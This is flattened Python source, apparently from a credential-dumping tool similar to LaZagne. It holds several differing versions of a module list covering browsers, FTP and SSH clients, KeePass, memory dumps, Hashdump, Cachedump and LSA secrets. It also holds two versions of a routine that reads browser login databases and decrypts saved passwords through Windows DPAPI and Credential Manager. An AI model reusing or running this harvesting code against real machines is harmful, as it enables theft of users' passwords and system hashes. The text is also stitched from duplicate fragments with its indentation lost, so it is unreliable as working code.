def get_modules():
moduleNames = [
ApacheDirectoryStudio(),
Autologon(),
Dbvisualizer(),
Chrome(),
CSE(),
CoreFTP(),
Cyberduck(),
Filezilla(),
FtpNavigator(),
GalconFusion(),
GitForWindows(),
IE(),
Jitsi(),
KalypsoMedia(),
MavenRepositories(),
MemoryDump(), # retrieve browers and keepass passwords
Keepass(), # should be launched after memory dump
Mozilla(),
Composer(),
Credman(),
OpenSSHForWindows(),
Opera(),
Outlook(),
Pidgin(),
Puttycm(),
RDPManager(),
Robomongo(),
RoguesTale(),
Tortoise(),
Skype(),
SQLDeveloper(),
Squirrel(),
Turba(),
Unattended(),
Vault(),
Wifi(),
WinSCP(),
Cachedump(),
Hashdump(),
LSASecrets()
]
return moduleNames
def get_modules(): moduleNames = [ # Browser Chrome(), Mozilla(), Opera(), CocCoc(), # Chats Pidgin(), # Databases Dbvisualizer(), Robomongo(), SQLDeveloper(), Squirrel(), # SVN Tortoise(), # Sysadmin ApacheDirectoryStudio(), Filezilla(), FtpNavigator(), Unattended(), # Wifi Wifi(), # Windows DPAPIHash(), Cachedump(), Credman(), Vault(), Hashdump(), LSASecrets(), Sysvault() ] return moduleNames
def get_modules():
module_names = [
# Browser
IE(),
UCBrowser(),
# Chats
Pidgin(),
Skype(),
PSI(),
# Databases
Dbvisualizer(),
Squirrel(),
SQLDeveloper(),
Robomongo(),
PostgreSQL(),
# games
KalypsoMedia(),
GalconFusion(),
RoguesTale(),
Turba(),
# Git
GitForWindows(),
# Mails
Outlook(),
Thunderbird(),
# Maven
MavenRepositories(),
# Memory
MemoryDump(), # retrieve browsers and keepass passwords
Keepass(), # should be launched after memory dump
# Php
Composer(),
# SVN
Tortoise(),
# Sysadmin
ApacheDirectoryStudio(),
CoreFTP(),
Cyberduck(),
Filezilla(),
FtpNavigator(),
Puttycm(),
OpenSSHForWindows(),
RDPManager(),
Unattended(),
WinSCP(),
# Wifi
Wifi(),
# Windows
Autologon(),
Cachedump(),
Credman(),
Hashdump(),
LSASecrets(),
Vault(),
WindowsPassword(),
CredFiles(),
]
return module_names + chromium_browsers + firefox_browsers
def _export_credentials(self, db_path, is_yandex=False, master_key=None):
"""
Export credentials from the given database
:param unicode db_path: database path
:return: list of credentials
:rtype: tuple
"""
credentials = []
yandex_enckey = None
if is_yandex:
try:
credman_passwords = Credman().run()
for credman_password in credman_passwords:
if b'Yandex' in credman_password.get('URL', b''):
if credman_password.get('Password'):
yandex_enckey = credman_password.get('Password')
self.info('EncKey found: {encKey}'.format(
encKey=repr(yandex_enckey)))
except Exception:
self.debug(traceback.format_exc())
# Passwords could not be decrypted without encKey
self.info('EncKey has not been retrieved')
return []
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
cursor.execute(self.database_query)
except Exception:
self.debug(traceback.format_exc())
return credentials
for url, login, password in cursor.fetchall():
try:
# Yandex passwords use a masterkey stored on windows credential manager
# https://yandex.com/support/browser-passwords-crypto/without-master.html
if is_yandex and yandex_enckey:
try:
try:
p = json.loads(str(password))
except Exception:
p = json.loads(password)
password = base64.b64decode(p['p'])
except Exception:
# New version does not use json format
pass
# Passwords are stored using AES-256-GCM algorithm
# The key used to encrypt is stored on the credential manager
# yandex_enckey:
# - 4 bytes should be removed to be 256 bits
# - these 4 bytes correspond to the nonce ?
# cipher = AES.new(yandex_enckey, AES.MODE_GCM)
# plaintext = cipher.decrypt(password)
# Failed...
else:
# Decrypt the Password
try:
password_bytes = Win32CryptUnprotectData(
password,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
except AttributeError:
try:
password_bytes = Win32CryptUnprotectData(
password,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
except:
password_bytes = None
if password_bytes is not None:
password = password_bytes.decode("utf-8")
elif master_key:
password = self._decrypt_v80(password, master_key)
if not url and not login and not password:
continue
credentials.append((url, login, password))
except Exception:
self.debug(traceback.format_exc())
conn.close()
return credentials
def _export_credentials(self, db_path, is_yandex=False):
"""
Export credentials from the given database
:param unicode db_path: database path
:return: list of credentials
:rtype: tuple
"""
credentials = []
yandex_enckey = None
if is_yandex:
try:
credman_passwords = Credman().run()
for credman_password in credman_passwords:
if b'Yandex' in credman_password.get('URL', b''):
if credman_password.get('Password'):
yandex_enckey = credman_password.get('Password')
self.info('EncKey found: {encKey}'.format(
encKey=repr(yandex_enckey)))
except Exception:
self.debug(traceback.format_exc())
# Passwords could not be decrypted without encKey
self.info('EncKey has not been retrieved')
return []
try:
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
cursor.execute(self.database_query)
except Exception:
self.debug(traceback.format_exc())
return credentials
for url, login, password in cursor.fetchall():
try:
# Yandex passwords use a masterkey stored on windows credential manager
# https://yandex.com/support/browser-passwords-crypto/without-master.html
if is_yandex and yandex_enckey:
try:
p = json.loads(str(password))
except Exception:
p = json.loads(password)
password = base64.b64decode(p['p'])
# Passwords are stored using AES-256-GCM algorithm
# The key used to encrypt is stored on the credential manager
# from cryptography.hazmat.primitives.ciphers.aead import AESGCM
# aesgcm = AESGCM(yandex_enckey)
# Failed...
else:
# Decrypt the Password
password = Win32CryptUnprotectData(
password,
is_current_user=constant.is_current_user,
user_dpapi=constant.user_dpapi)
if not url and not login and not password:
continue
credentials.append((url, login, password))
except Exception:
self.debug(traceback.format_exc())
conn.close()
return credentials
